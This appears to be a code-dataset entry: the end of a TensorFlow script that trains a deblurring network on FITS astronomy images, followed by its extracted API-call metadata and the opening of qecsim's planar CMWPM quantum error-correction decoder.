pre = tf.reshape(dense,imgsize)+blur
loss=mse(pre,oril)
tf.summary.image('Output', pre, 10)
tf.summary.scalar('loss', loss)
with tf.name_scope('Train'):
step=tf.Variable(0,trainable=False)
learnrate=tf.train.exponential_decay(5.0, step, 100, 0.96, staircase = True)
train_step = tf.train.AdadeltaOptimizer(learnrate).minimize(loss, global_step = step)
#---------------------------------Read Data------------------------------------#
files=glob.glob('gauss127/*.fits')
files.sort(reverse = True)
trainset=open('train.txt','r')
train=[]
for trainname in trainset:
train.append(trainname.split('\n')[0])
#-----------------------------------Initiate-----------------------------------#
init = tf.global_variables_initializer()
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.gpu_options.allocator_type = 'BFC'
with tf.Session(config = config) as sess:
sess.run(init)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(log_dir + 'train', sess.graph)
test_writer = tf.summary.FileWriter(log_dir + 'test', sess.graph)
saver = tf.train.Saver(max_to_keep=128)
sess.graph.finalize()
#----------------------------------Iteration-----------------------------------#
for epoch in range(1,max_step+1):
trainloss = []
testloss = []
s=time.clock()
for fitsfile in files:
name=fitsfile.split('/')[-1]
blurred=fits.open('gauss127/'+name)[0].data
try:
original=fits.open('original/'+name)[0].data
except IOError:
original=np.zeros(blurred.shape)
blurred=tobatch(blurred,weight,height)
original=tobatch(original,weight,height)
blurred=blurred.reshape([num,weight,height,1])
original=original.reshape([num,weight,height,1])
if name in train:
epoch_result =np.zeros([num,weight,height])
for batch in range(0,num):
Input_x=np.zeros([1,weight,height,1],dtype=np.float32)
Input_y=np.zeros([1,weight,height,1],dtype=np.float32)
Input_x[0]=np.float32(blurred[batch])
Input_y[0]=np.float32(original[batch])
_,lvalue,summary,result=sess.run([train_step,loss,merged,pre],
feed_dict={blur:Input_x,oril:Input_y})
train_writer.add_summary(summary, epoch)
saver.save(sess, checkpoint_dir + 'model'+str(batch)+'.ckpt', global_step=batch+1,write_meta_graph=False,write_state=False)
epoch_result[batch]=result.reshape(weight,height)
epoch_result=toarray(epoch_result)
recon=np.int16(epoch_result)
trainloss.append(lvalue)
train_writer.close()
if os.path.isfile(save_dir+'Train_'+name) is True:
os.remove(save_dir+'Train_'+name)
fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Train_'+name)
else:
epoch_result =np.zeros([num,weight,height])
for batch in range(0,num):
Input_x=np.zeros([1,weight,height,1],dtype=np.float32)
Input_y=np.zeros([1,weight,height,1],dtype=np.float32)
Input_x[0]=np.float32(blurred[batch])
Input_y[0]=np.float32(original[batch])
saver.restore(sess, checkpoint_dir +'model'+str(batch)+'.ckpt-'+str(batch+1))
lvalue,summary,result=sess.run([loss,merged,pre],
feed_dict={blur:Input_x,oril:Input_y})
test_writer.add_summary(summary, epoch)
epoch_result[batch]=result.reshape(weight,height)
epoch_result=toarray(epoch_result)
recon=np.int16(epoch_result)
testloss.append(lvalue)
test_writer.close()
if os.path.isfile(save_dir +'Test_'+name) is True:
os.remove(save_dir+'Test_'+name)
fits.HDUList([fits.PrimaryHDU(recon)]).writeto(save_dir+'Test_'+name)
e=time.clock()
print('Epoch %d mean train loss is %e, time is %f.'%(epoch,np.mean(trainloss),(e-s)))
print('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss)))
logger.info('Epoch %d mean train loss is %e, time is %f'%(epoch,np.mean(trainloss),(e-s)))
logger.info('Epoch %d mean test loss is %e.'%(epoch,np.mean(testloss)))
if os.path.isfile('residual/'+name) is True:
os.remove('residual/'+name)
original=toarray(original.reshape(num,weight,height))
fits.HDUList([fits.PrimaryHDU(original-recon)]).writeto('residual/'+name)
|
[
"tensorflow.nn.batch_normalization",
"os.remove",
"tensorflow.train.AdadeltaOptimizer",
"numpy.floor",
"tensorflow.reshape",
"astropy.io.fits.PrimaryHDU",
"logging.Formatter",
"tensorflow.ConfigProto",
"os.path.isfile",
"tensorflow.Variable",
"tensorflow.assign",
"tensorflow.nn.conv2d",
"tensorflow.layers.max_pooling2d",
"glob.glob",
"numpy.mean",
"tensorflow.truncated_normal",
"tensorflow.nn.moments",
"tensorflow.layers.Input",
"manager.GPUManager",
"tensorflow.pad",
"time.clock",
"tensorflow.placeholder",
"tensorflow.summary.FileWriter",
"tensorflow.name_scope",
"tensorflow.summary.merge_all",
"tensorflow.summary.image",
"tensorflow.control_dependencies",
"tensorflow.summary.scalar",
"tensorflow.train.Saver",
"tensorflow.global_variables_initializer",
"tensorflow.Session",
"astropy.io.fits.open",
"tensorflow.train.exponential_decay",
"numpy.float32",
"tensorflow.layers.dense",
"numpy.zeros",
"numpy.dtype",
"tensorflow.square",
"numpy.int16",
"logging.handlers.RotatingFileHandler",
"logging.getLogger",
"numpy.sqrt"
] |
[((659, 671), 'manager.GPUManager', 'GPUManager', ([], {}), '()\n', (669, 671), False, 'from manager import GPUManager\n'), ((991, 1083), 'logging.handlers.RotatingFileHandler', 'logging.handlers.RotatingFileHandler', (['LOG_FILE'], {'maxBytes': '(10 * 1024 * 1024)', 'backupCount': '(5)'}), '(LOG_FILE, maxBytes=10 * 1024 * 1024,\n backupCount=5)\n', (1027, 1083), False, 'import logging, logging.handlers\n'), ((1169, 1191), 'logging.Formatter', 'logging.Formatter', (['fmt'], {}), '(fmt)\n', (1186, 1191), False, 'import logging, logging.handlers\n'), ((1243, 1276), 'logging.getLogger', 'logging.getLogger', (['"""train_detail"""'], {}), "('train_detail')\n", (1260, 1276), False, 'import logging, logging.handlers\n'), ((6538, 6566), 'glob.glob', 'glob.glob', (['"""gauss127/*.fits"""'], {}), "('gauss127/*.fits')\n", (6547, 6566), False, 'import os, glob, time\n'), ((6800, 6833), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (6831, 6833), True, 'import tensorflow as tf\n'), ((6844, 6860), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (6858, 6860), True, 'import tensorflow as tf\n'), ((920, 944), 'os.path.isfile', 'os.path.isfile', (['LOG_FILE'], {}), '(LOG_FILE)\n', (934, 944), False, 'import os, glob, time\n'), ((958, 977), 'os.remove', 'os.remove', (['LOG_FILE'], {}), '(LOG_FILE)\n', (967, 977), False, 'import os, glob, time\n'), ((1746, 1782), 'tensorflow.pad', 'tf.pad', (['Input', 'paddings', '"""SYMMETRIC"""'], {}), "(Input, paddings, 'SYMMETRIC')\n", (1752, 1782), True, 'import tensorflow as tf\n'), ((4559, 4569), 'numpy.sqrt', 'np.sqrt', (['n'], {}), '(n)\n', (4566, 4569), True, 'import numpy as np\n'), ((4580, 4600), 'numpy.zeros', 'np.zeros', (['[n_w, n_h]'], {}), '([n_w, n_h])\n', (4588, 4600), True, 'import numpy as np\n'), ((4818, 4846), 'tensorflow.name_scope', 'tf.name_scope', (['"""Placeholder"""'], {}), "('Placeholder')\n", (4831, 4846), True, 'import tensorflow as tf\n'), ((4859, 4918), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Blur"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Blur')\n", (4873, 4918), True, 'import tensorflow as tf\n'), ((4930, 4989), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[1, 4096, 4096, 1]'], {'name': '"""Oril"""'}), "(tf.float32, [1, 4096, 4096, 1], name='Oril')\n", (4944, 4989), True, 'import tensorflow as tf\n'), ((5067, 5107), 'tensorflow.summary.image', 'tf.summary.image', (['"""Blur_input"""', 'blur', '(10)'], {}), "('Blur_input', blur, 10)\n", (5083, 5107), True, 'import tensorflow as tf\n'), ((5112, 5152), 'tensorflow.summary.image', 'tf.summary.image', (['"""Oril_input"""', 'oril', '(10)'], {}), "('Oril_input', oril, 10)\n", (5128, 5152), True, 'import tensorflow as tf\n'), ((5240, 5269), 'tensorflow.name_scope', 'tf.name_scope', (['"""Hidden_Layer"""'], {}), "('Hidden_Layer')\n", (5253, 5269), True, 'import tensorflow as tf\n'), ((6036, 6057), 'tensorflow.name_scope', 'tf.name_scope', (['"""Loss"""'], {}), "('Loss')\n", (6049, 6057), True, 'import tensorflow as tf\n'), ((6127, 6162), 'tensorflow.summary.image', 'tf.summary.image', (['"""Output"""', 'pre', '(10)'], {}), "('Output', pre, 10)\n", (6143, 6162), True, 'import tensorflow as tf\n'), ((6167, 6198), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (6184, 6198), True, 'import tensorflow as tf\n'), ((6211, 6233), 'tensorflow.name_scope', 'tf.name_scope', (['"""Train"""'], {}), "('Train')\n", (6224, 6233), True, 'import tensorflow as tf\n'), ((6245, 6276), 'tensorflow.Variable', 'tf.Variable', (['(0)'], {'trainable': '(False)'}), '(0, trainable=False)\n', (6256, 6276), True, 'import tensorflow as tf\n'), ((6290, 6354), 'tensorflow.train.exponential_decay', 'tf.train.exponential_decay', (['(5.0)', 'step', '(100)', '(0.96)'], {'staircase': '(True)'}), '(5.0, step, 100, 0.96, staircase=True)\n', (6316, 6354), True, 'import tensorflow as tf\n'), ((6945, 6970), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (6955, 6970), True, 'import tensorflow as tf\n'), ((7014, 7036), 'tensorflow.summary.merge_all', 'tf.summary.merge_all', ([], {}), '()\n', (7034, 7036), True, 'import tensorflow as tf\n'), ((7056, 7108), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'train')", 'sess.graph'], {}), "(log_dir + 'train', sess.graph)\n", (7077, 7108), True, 'import tensorflow as tf\n'), ((7127, 7178), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(log_dir + 'test')", 'sess.graph'], {}), "(log_dir + 'test', sess.graph)\n", (7148, 7178), True, 'import tensorflow as tf\n'), ((7191, 7222), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'max_to_keep': '(128)'}), '(max_to_keep=128)\n', (7205, 7222), True, 'import tensorflow as tf\n'), ((1518, 1545), 'numpy.floor', 'np.floor', (['(ker_size[0] / 2.0)'], {}), '(ker_size[0] / 2.0)\n', (1526, 1545), True, 'import numpy as np\n'), ((1601, 1628), 'numpy.floor', 'np.floor', (['(ker_size[1] / 2.0)'], {}), '(ker_size[1] / 2.0)\n', (1609, 1628), True, 'import numpy as np\n'), ((1869, 1888), 'tensorflow.name_scope', 'tf.name_scope', (['"""BN"""'], {}), "('BN')\n", (1882, 1888), True, 'import tensorflow as tf\n'), ((3001, 3037), 'tensorflow.name_scope', 'tf.name_scope', (['"""Convolutional_Layer"""'], {}), "('Convolutional_Layer')\n", (3014, 3037), True, 'import tensorflow as tf\n'), ((3099, 3129), 'tensorflow.layers.Input', 'tf.layers.Input', ([], {'tensor': 'padded'}), '(tensor=padded)\n', (3114, 3129), True, 'import tensorflow as tf\n'), ((4534, 4552), 'numpy.sqrt', 'np.sqrt', (['(n * w * h)'], {}), '(n * w * h)\n', (4541, 4552), True, 'import numpy as np\n'), ((5944, 5968), 'tensorflow.layers.dense', 'tf.layers.dense', (['cl10', '(1)'], {}), '(cl10, 1)\n', (5959, 5968), True, 'import tensorflow as tf\n'), ((6069, 6095), 'tensorflow.reshape', 'tf.reshape', (['dense', 'imgsize'], {}), '(dense, imgsize)\n', (6079, 6095), True, 'import tensorflow as tf\n'), ((7425, 7437), 'time.clock', 'time.clock', ([], {}), '()\n', (7435, 7437), False, 'import os, glob, time\n'), ((10362, 10374), 'time.clock', 'time.clock', ([], {}), '()\n', (10372, 10374), False, 'import os, glob, time\n'), ((2405, 2469), 'tensorflow.assign', 'tf.assign', (['pop_mean', '(pop_mean * decay + batch_mean * (1 - decay))'], {}), '(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n', (2414, 2469), True, 'import tensorflow as tf\n'), ((2485, 2546), 'tensorflow.assign', 'tf.assign', (['pop_var', '(pop_var * decay + batch_var * (1 - decay))'], {}), '(pop_var, pop_var * decay + batch_var * (1 - decay))\n', (2494, 2546), True, 'import tensorflow as tf\n'), ((2732, 2804), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'pop_mean', 'pop_var', 'beta', 'scale', '(0.0001)'], {}), '(input, pop_mean, pop_var, beta, scale, 0.0001)\n', (2757, 2804), True, 'import tensorflow as tf\n'), ((3330, 3388), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['[k_num]'], {'stddev': '(5.0)', 'dtype': 'tf.float32'}), '([k_num], stddev=5.0, dtype=tf.float32)\n', (3349, 3388), True, 'import tensorflow as tf\n'), ((3412, 3483), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['raw_image', 'weights'], {'strides': '[1, 1, 1, 1]', 'padding': '"""VALID"""'}), "(raw_image, weights, strides=[1, 1, 1, 1], padding='VALID')\n", (3424, 3483), True, 'import tensorflow as tf\n'), ((3647, 3711), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Act', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Act, p_size, strides=1, padding='valid')\n", (3670, 3711), True, 'import tensorflow as tf\n'), ((3756, 3821), 'tensorflow.layers.max_pooling2d', 'tf.layers.max_pooling2d', (['Conv', 'p_size'], {'strides': '(1)', 'padding': '"""valid"""'}), "(Conv, p_size, strides=1, padding='valid')\n", (3779, 3821), True, 'import tensorflow as tf\n'), ((4137, 4153), 'tensorflow.square', 'tf.square', (['(r - x)'], {}), '(r - x)\n', (4146, 4153), True, 'import tensorflow as tf\n'), ((4274, 4289), 'numpy.dtype', 'np.dtype', (['""">i2"""'], {}), "('>i2')\n", (4282, 4289), True, 'import numpy as np\n'), ((6374, 6411), 'tensorflow.train.AdadeltaOptimizer', 'tf.train.AdadeltaOptimizer', (['learnrate'], {}), '(learnrate)\n', (6400, 6411), True, 'import tensorflow as tf\n'), ((10734, 10768), 'os.path.isfile', 'os.path.isfile', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10748, 10768), False, 'import os, glob, time\n'), ((10788, 10817), 'os.remove', 'os.remove', (["('residual/' + name)"], {}), "('residual/' + name)\n", (10797, 10817), False, 'import os, glob, time\n'), ((2256, 2287), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0, 1, 2]'], {}), '(input, [0, 1, 2])\n', (2269, 2287), True, 'import tensorflow as tf\n'), ((2342, 2367), 'tensorflow.nn.moments', 'tf.nn.moments', (['input', '[0]'], {}), '(input, [0])\n', (2355, 2367), True, 'import tensorflow as tf\n'), ((2555, 2603), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[train_mean, train_var]'], {}), '([train_mean, train_var])\n', (2578, 2603), True, 'import tensorflow as tf\n'), ((2627, 2703), 'tensorflow.nn.batch_normalization', 'tf.nn.batch_normalization', (['input', 'batch_mean', 'batch_var', 'beta', 'scale', '(0.0001)'], {}), '(input, batch_mean, batch_var, beta, scale, 0.0001)\n', (2652, 2703), True, 'import tensorflow as tf\n'), ((8006, 8037), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (8014, 8037), True, 'import numpy as np\n'), ((8871, 8893), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (8879, 8893), True, 'import numpy as np\n'), ((9237, 9268), 'numpy.zeros', 'np.zeros', (['[num, weight, height]'], {}), '([num, weight, height])\n', (9245, 9268), True, 'import numpy as np\n'), ((10039, 10061), 'numpy.int16', 'np.int16', (['epoch_result'], {}), '(epoch_result)\n', (10047, 10061), True, 'import numpy as np\n'), ((7530, 7559), 'astropy.io.fits.open', 'fits.open', (["('gauss127/' + name)"], {}), "('gauss127/' + name)\n", (7539, 7559), False, 'from astropy.io import fits\n'), ((7697, 7720), 'numpy.zeros', 'np.zeros', (['blurred.shape'], {}), '(blurred.shape)\n', (7705, 7720), True, 'import numpy as np\n'), ((8107, 8157), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8115, 8157), True, 'import numpy as np\n'), ((8182, 8232), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (8190, 8232), True, 'import numpy as np\n'), ((8260, 8286), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (8270, 8286), True, 'import numpy as np\n'), ((8318, 8345), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (8328, 8345), True, 'import numpy as np\n'), ((9000, 9042), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9014, 9042), False, 'import os, glob, time\n'), ((9068, 9105), 'os.remove', 'os.remove', (["(save_dir + 'Train_' + name)"], {}), "(save_dir + 'Train_' + name)\n", (9077, 9105), False, 'import os, glob, time\n'), ((9338, 9388), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9346, 9388), True, 'import numpy as np\n'), ((9413, 9463), 'numpy.zeros', 'np.zeros', (['[1, weight, height, 1]'], {'dtype': 'np.float32'}), '([1, weight, height, 1], dtype=np.float32)\n', (9421, 9463), True, 'import numpy as np\n'), ((9491, 9517), 'numpy.float32', 'np.float32', (['blurred[batch]'], {}), '(blurred[batch])\n', (9501, 9517), True, 'import numpy as np\n'), ((9549, 9576), 'numpy.float32', 'np.float32', (['original[batch]'], {}), '(original[batch])\n', (9559, 9576), True, 'import numpy as np\n'), ((10165, 10206), 'os.path.isfile', 'os.path.isfile', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10179, 10206), False, 'import os, glob, time\n'), ((10233, 10269), 'os.remove', 'os.remove', (["(save_dir + 'Test_' + name)"], {}), "(save_dir + 'Test_' + name)\n", (10242, 10269), False, 'import os, glob, time\n'), ((10442, 10460), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10449, 10460), True, 'import numpy as np\n'), ((10523, 10540), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10530, 10540), True, 'import numpy as np\n'), ((10615, 10633), 'numpy.mean', 'np.mean', (['trainloss'], {}), '(trainloss)\n', (10622, 10633), True, 'import numpy as np\n'), ((10703, 10720), 'numpy.mean', 'np.mean', (['testloss'], {}), '(testloss)\n', (10710, 10720), True, 'import numpy as np\n'), ((7608, 7637), 'astropy.io.fits.open', 'fits.open', (["('original/' + name)"], {}), "('original/' + name)\n", (7617, 7637), False, 'from astropy.io import fits\n'), ((10900, 10933), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['(original - recon)'], {}), '(original - recon)\n', (10915, 10933), False, 'from astropy.io import fits\n'), ((9132, 9154), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (9147, 9154), False, 'from astropy.io import fits\n'), ((10296, 10318), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['recon'], {}), '(recon)\n', (10311, 10318), False, 'from astropy.io import fits\n')]
|
import functools
import itertools
import logging
import operator
import numpy as np
from qecsim import graphtools as gt
from qecsim.model import Decoder, cli_description
logger = logging.getLogger(__name__)
@cli_description('Converging MWPM ([factor] FLOAT >=0, ...)')
class PlanarCMWPMDecoder(Decoder):
"""
Implements a planar Converging Minimum Weight Perfect Matching (CMWPM) decoder.
Decoding algorithm:
* Resolve syndrome plaquettes using: :meth:`qecsim.models.planar.PlanarCode.syndrome_to_plaquette_indices`.
* Separate syndrome plaquettes into primal and dual plaquettes.
* For max_iterations:
* Resolve matched_primal_pairs using MWPM with edge weights between primal plaquettes given by the taxi-cab
distance through a background grid determined by the previous_matched_dual_pairs.
* Resolve matched_dual_pairs using MWPM with edge weights between dual plaquettes given by the taxi-cab distance
through a background grid determined by the previous_matched_primal_pairs.
* Stop if matched_primal_pairs = previous_matched_primal_pairs and matched_dual_pairs =
previous_matched_dual_pairs.
* Return recovery operator by applying the shortest path between matching pairs using:
:meth:`qecsim.models.planar.PlanarPauli.path`.
Notes on background grid:
* The grid is initialised with a grid factor (e.g. 3), box-shape (e.g. tight) and distance-algorithm (e.g. 1), and
each edge is given an initial weight (e.g. 1).
* The grid background is set such that, for each pair of syndrome indices (e.g. matched Z syndromes), all edges
outside the chosen box-shape (see below), bounding the pair of indices, is multiplied by the grid factor.
* The distance between any two syndrome indices (e.g. unmatched X syndromes) is weighted by the taxi-cab path
through the background according to the chosen distance algorithm (see below).
* A minimum-weight perfect matching in a graph of syndrome indices (e.g. unmatched X syndromes) with edges weighted
by distance through the background gives matched pairs (e.g. matched X syndromes) taking into account correlations
with the background (e.g. matched Z syndromes).
* Box shape defines area outside of which the background is multiplied by the grid factor:
Tight::
X+ + +
+ + + +
+ + +
+ + + +
+ + +X
Rounded::
+ +
X+ + +
+ + + +
+ + + + +
+ + + +
+ + +X
+ +
Fitted::
+ + +
X+ + + +
+ + + +
+ + + + +
+ + + +
+ + + +X
+ + +
Loose::
+ + + +
+X+ + + +
+ + + +
+ + + + +
+ + + +
+ + + +X+
+ + + +
* Distance algorithm defines how the path sum over the background of weighted edges is calculated:
Alg. 1::
X+ + +
| + + +
+ + +
| + + +
- - -X
Alg. 2::
X+ + + X- - -
| + + + + + + |
min( + + + , + + + )
| + + + + + + |
- - -X + + +X
Alg. 4::
X+ + + X- - - X+ + + X- | +
| + + + + + + | | + + + + + + +
min( + + + , + + + , - - - , + | + )
| + + + + + + | + + + | + + + +
- - -X + + +X + + +X + - -X
"""
def __init__(self, factor=3, max_iterations=4, box_shape='t', distance_algorithm=4):
"""
Initialise new planar CMWPM decoder.
:param factor: Multiplication factor.
:type factor: int or float
:param max_iterations: Maximum number of iterations. (default=4, 0=null, 1=MWPM, 2+=CMWPM)
:type max_iterations: int
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
:param distance_algorithm: Distance algorithm. (default=4, 1=h+v, 2=min(h+v,v+h), 4=min(h+v,v+h,h+v+h,v+h+v)
:type distance_algorithm: int
:raises ValueError: if factor is not >= 0.0.
:raises ValueError: if max_iterations is not >= 0.
:raises ValueError: if box_shape not in ('t', 'r', 'f', 'l').
:raises ValueError: if distance_algorithm not in (1, 2, 4).
:raises TypeError: if any parameter is of an invalid type.
"""
try: # paranoid checking for CLI. (operator.index ensures the parameter can be treated as an int)
if not factor >= 0.0:
raise ValueError('{} valid factor values are number >= 0.0'.format(type(self).__name__))
if not operator.index(max_iterations) >= 0:
raise ValueError('{} valid max_iterations values are integer >= 0'.format(type(self).__name__))
if box_shape not in ('t', 'r', 'f', 'l'):
raise ValueError("{} valid box_shape values are ('t', 'r', 'f', 'l')".format(type(self).__name__))
if distance_algorithm not in (1, 2, 4):
raise ValueError('{} valid distance_algorithm values are (1, 2, 4)'.format(type(self).__name__))
except TypeError as ex:
raise TypeError('{} invalid parameter type'.format(type(self).__name__)) from ex
self._factor = factor
self._max_iterations = max_iterations
self._box_shape = box_shape
self._distance_algorithm = distance_algorithm
self._debug_iterations = False
@classmethod
def _recovery_pauli(cls, code, *match_sets):
# prepare recovery
recovery_pauli = code.new_pauli()
for matches in match_sets:
# apply paths
for a_index, b_index in matches:
# add path to recover
recovery_pauli.path(a_index, b_index)
return recovery_pauli
def decode(self, code, syndrome, **kwargs):
"""See :meth:`qecsim.model.Decoder.decode`"""
# get syndrome indices
syndrome_indices = code.syndrome_to_plaquette_indices(syndrome)
# split indices into primal and dual
primal_indices = frozenset(i for i in syndrome_indices if code.is_primal(i))
dual_indices = frozenset(i for i in syndrome_indices if code.is_dual(i))
# converge on matching
grid = self.StepGrid(code)
# prepare previous and current matches (in case max_iterations is 0)
previous_primal_matches = primal_matches = frozenset()
previous_dual_matches = dual_matches = frozenset()
# Catch and log floating point errors. This may happen if factor is large/small and there are many matches.
with np.errstate(all='raise'):
try:
for _ in range(self._max_iterations):
primal_matches = grid.mwpm(previous_dual_matches, primal_indices, factor=self._factor,
box_shape=self._box_shape, distance_algorithm=self._distance_algorithm)
dual_matches = grid.mwpm(previous_primal_matches, dual_indices, factor=self._factor,
box_shape=self._box_shape, distance_algorithm=self._distance_algorithm)
if primal_matches == previous_primal_matches and dual_matches == previous_dual_matches:
break
previous_primal_matches = primal_matches
previous_dual_matches = dual_matches
except FloatingPointError as fpe:
logger.warning('FPE RAISED FloatingPointError: {}'.format(fpe))
# prepare recovery
recovery_pauli = self._recovery_pauli(code, primal_matches, dual_matches)
# return recover as bsf
return recovery_pauli.to_bsf()
@property
def label(self):
"""See :meth:`qecsim.model.Decoder.label`"""
params = [('factor', self._factor), ('max_iterations', self._max_iterations), ('box_shape', self._box_shape),
('distance_algorithm', self._distance_algorithm), ]
return 'Planar CMWPM ({})'.format(', '.join('{}={}'.format(k, v) for k, v in params if v))
def __repr__(self):
return '{}({!r}, {!r}, {!r}, {!r})'.format(
type(self).__name__, self._factor, self._max_iterations, self._box_shape, self._distance_algorithm,
)
class StepGrid:
"""
Grid providing a weighted background for MWPM.
Methods:
* Set background weights based on matched index pairs: :meth:`set_background`.
* Resolve taxi-cab distance, weighted by the background, between a pair of indices: :meth:`distance`.
* Minimum weight perfect matching in a graph of indices where sites are weighted based on distance through the
background: :meth:`mwpm`.
"""
def __init__(self, code):
"""
Initialise new step grid.
:param code: Planar code.
:type code: PlanarCode
"""
self._code = code
# NOTE: size is bounds +3 (+1 because bounds is inclusive, +2 for border to include virtual indices)
# NOTE: we use dtype=float because we get overflow to negative with int64 at 3^40.
self._grid = np.zeros((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float)
self.set_background()
def set_background(self, matched_indices=None, factor=3, initial=1, box_shape='t'):
"""
Set grid background from matched syndrome indices.
Note:
* The grid is initialised with initial value at all sites and zero elsewhere.
* For each matched pair of syndrome indices, all sites outside the box-shape, bounding the pair of indices,
are multiplied by factor.
:param matched_indices: Matched pairs of syndrome indices.
:type matched_indices: set of 2-tuples of 2-tuple of int
:param factor: Multiplication factor. (default=3)
:type factor: int or float
:param initial: Initial edge weight. (default=1)
:type initial: int or float
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
"""
assert box_shape in ('t', 'r', 'f', 'l'), 'StepGrid: Unsupported box shape'
self._grid.fill(0)
self._grid[::2, ::2] = initial
self._grid[1::2, 1::2] = initial
if matched_indices:
for src_i, tgt_i in matched_indices:
# if both indices virtual then skip
if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)):
continue
# multiply all elements outside box defined by syndrome indices
if box_shape == 'r':
self._box_rounded(src_i, tgt_i, factor)
elif box_shape == 'f':
self._box_fitted(src_i, tgt_i, factor)
elif box_shape == 'l':
self._box_loose(src_i, tgt_i, factor)
else:
self._box_tight(src_i, tgt_i, factor)
@classmethod
def _syndrome_to_grid_index(cls, *syndrome_indices):
"""
Convert given syndrome indices to grid indices allowing for border of virtual indices around grid.
:param syndrome_indices: Any number of syndrome indices.
:type syndrome_indices: 2-tuples of int
:return: Grid indices
:rtype: 2-tuples of int
"""
return tuple((syndrome_index[0] + 1, syndrome_index[1] + 1) for syndrome_index in syndrome_indices)
@classmethod
def _box_corners(cls, *indices):
"""
Top-left and bottom-right corners of box that bounds the given indices.
:param indices: Any number of indices.
:type indices: 2-tuples of int
:return: Top-left and bottom-right indices.
:rtype: 2-tuple of 2-tuple of int
"""
min_r = min(indices, key=lambda i: i[0])[0]
max_r = max(indices, key=lambda i: i[0])[0]
min_c = min(indices, key=lambda i: i[1])[1]
max_c = max(indices, key=lambda i: i[1])[1]
return (min_r, min_c), (max_r, max_c)
def _multiply_box(self, top_left_i, bottom_right_i, factor):
"""
Multiply all sites inside box with given corner indices (boundary sites are multiplied).
:param top_left_i: Top-left grid index.
:type top_left_i: 2-tuple of int
:param bottom_right_i: Bottom-right grid index.
:type bottom_right_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
min_r = max(0, top_left_i[0])
max_r = min(self._grid.shape[0] - 1, bottom_right_i[0])
min_c = max(0, top_left_i[1])
max_c = min(self._grid.shape[1] - 1, bottom_right_i[1])
self._grid[min_r:max_r + 1, min_c:max_c + 1] *= factor
def _multiply_box_complement(self, top_left_i, bottom_right_i, factor):
"""
Multiply all sites outside box with given corner indices (boundary sites are not multiplied).
:param top_left_i: Top-left grid index.
:type top_left_i: 2-tuple of int
:param bottom_right_i: Bottom-right grid index.
:type bottom_right_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
min_r = max(0, top_left_i[0])
max_r = min(self._grid.shape[0] - 1, bottom_right_i[0])
min_c = max(0, top_left_i[1])
max_c = min(self._grid.shape[1] - 1, bottom_right_i[1])
# top rows
self._grid[:min_r] *= factor
# bottom rows
self._grid[max_r + 1:] *= factor
# left cols (between top and bottom rows)
self._grid[min_r:max_r + 1, :min_c] *= factor
# right cols (between top and bottom rows)
self._grid[min_r:max_r + 1, max_c + 1:] *= factor
def _box_tight(self, src_i, tgt_i, factor):
"""
Multiply all sites outside tight-box.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
min_i, max_i = self._box_corners(src_i, tgt_i) # box corners
# tight box
self._multiply_box_complement(min_i, max_i, factor)
def _box_rounded(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box with rounded corners.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
